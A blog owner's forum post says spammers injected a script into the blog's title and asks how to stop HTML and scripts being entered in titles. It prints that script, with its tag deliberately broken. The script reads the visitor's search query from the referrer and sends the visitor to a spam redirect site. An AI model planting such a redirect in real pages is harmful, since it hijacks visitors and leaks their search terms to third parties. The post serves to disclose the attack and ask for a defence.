I visited my site today to learn that spammers are actually starting to add scripts into the titles of blogs, that of all things feature redirects so if you type in the url of my site you end up at another site.
Below is the script in question I have crippled it by taking out some of the tags, but you get the idea. Note the double at the start, I think this is what allows them to do this.
'<scrpt type=”text/javascript” language=”javascript”>r=document.referrer;u=document.URL;t=”";se=”unknown”;k=”blog+hosting”;function a(c,d,e){if(r.indexOf(c)!=-1){t=d;se=e;}}a(”google.”,”q”,”google”);a(”msn.”,”q”,”msn”);a(”yahoo.”,”p”,”yahoo”);a(”altavista.”,”q”,”altavista”);a(”aol.”,”query”,”aol”);a(”ask.”,”q”,”ask”);a(”eureka.com.”,”q”,”eureka.com”);a(”lycos.com.”,”query”,”lycos”);a(”hotbot.com.”,”MT”,”hotbot”);a(”infoseek.com.”,”qt”,”infoseek.com”);a(”webcrawler.”,”searchText”,”webcrawler”);a(”excite.”,”search”,”excite”);a(”netscape.com.”,”search”,”netscape”);a(”mamma.com.”,”query”,”mamma”);a(”alltheweb.com.”,”query”,”alltheweb.com”);a(”northernlight.com.”,”qr”,”northernlight.com”);a(”seznam.cz.”,”q”,”seznam.cz”);if(t.length&&((q=r.indexOf(”?”+t+”=”))!=-1||(q=r.indexOf(”&”+t+”=”))!=-1))k=r.substring(q+2+t.length).split(”&”)[0];g=”http://www.specialsuggestion.com/rl_tds.php?ct=qUt%2Fq64k9OO3bCjvSgJ8blnCw3hrYMppfmIK29Majy0%3D&query_a=”+k+”&url_tb=http://www.find.fm/search.php?aid=1479&keyword=”+k;window.location=g;document.location=g;location.href=g;</scrpt>'
I looked around and found this thread, which seems to help, but was wondering if anything further has been done to keep people from being able to enter in html and scripts into blog titles.